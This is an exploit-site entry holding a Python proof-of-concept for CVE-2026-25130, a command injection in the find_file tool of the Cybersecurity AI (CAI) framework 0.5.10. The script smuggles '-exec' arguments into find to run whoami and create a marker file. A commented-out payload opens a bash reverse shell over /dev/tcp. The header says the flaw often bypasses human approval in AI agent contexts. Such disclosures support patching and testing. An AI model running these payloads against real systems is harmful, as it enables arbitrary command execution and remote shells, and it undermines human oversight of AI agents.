Cybersecurity AI (CAI) Framework 0.5.10 Exploit, Command Injection

# Exploit Title: Cybersecurity AI (CAI) Framework 0.5.10 - Command Injection
# CVE: CVE-2026-25130
# Date: 2026-02-03
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/yourusername
# Vendor Homepage: https://github.com/aliasrobotics/cai
# Software Link: https://github.com/aliasrobotics/cai
# Vulnerable Version: cai-framework <= 0.5.10
# Tested on: cai-framework 0.5.10
# Category: Argument Injection / OS Command Injection
# Platform: Python
# Exploit Type: Unauthenticated / Authenticated depending on agent context (often bypasses human approval)
#

#
# Usage:
#    Run the script directly (local execution )
#    Observe command output or side effects (e.g. whoami result, created files, etc.)

from cai.tools.reconnaissance.filesystem import find_file
import sys

def main():
    print("=== CVE-2026-25130 PoC - find_file Argument Injection / OS Command Injection ===")
    print("Vulnerable cai-framework <= 0.5.10")
    print("This demonstrates command execution via malicious 'args' parameter\n")

    # ────────────────────────────────────────────────────────────────
    # PoC 1: Simple proof – execute 'whoami' via -exec
    # ────────────────────────────────────────────────────────────────
    print("[Test 1] Executing 'whoami' via -exec")
    malicious_args = "-type f -exec whoami \\;"

    try:
        result = find_file(
            file_path="/tmp",               # Any readable directory
            args=malicious_args,
            ctf=None
        )
        print("[+] Command output:\n", result)
    except Exception as e:
        print("[-] Execution failed:", str(e))

    print("\n" + "-"*70 + "\n")

    # ────────────────────────────────────────────────────────────────
    # PoC 2: Touch a proof file (non-destructive marker)
    # ────────────────────────────────────────────────────────────────
    print("[Test 2] Creating marker file /tmp/CAI_CVE_2026_25130_PROOF")
    proof_args = '-type d -exec touch /tmp/CAI_CVE_2026_25130_PROOF \\;'

    try:
        result = find_file(
            file_path="/tmp",
            args=proof_args,
            ctf=None
        )
        print("[+] Result:\n", result)
        print("Check if file exists: ls -l /tmp/CAI_CVE_2026_25130_PROOF")
    except Exception as e:
        print("[-] Execution failed:", str(e))

    print("\n" + "-"*70 + "\n")

    # ────────────────────────────────────────────────────────────────
    # PoC 3: Dangerous example – reverse shell
    # ────────────────────────────────────────────────────────────────
    # print("[Test 3] Reverse shell example (DO NOT RUN UNLESS IN ISOLATED LAB)")
    # rev_args = '-exec bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1" \\;'
    # find_file("/tmp", rev_args)

    print("\nPoC finished.")
    print("If commands executed successfully → vulnerability confirmed.")
    print("After patch (commit e22a1220) these payloads should be rejected.")

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\n[!] Stopped by user.")
    except Exception as e:
        print(f"\n[!] Unexpected error: {e}")
        sys.exit(1)

All rights reserved nPulse.net 2009 - 2026
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD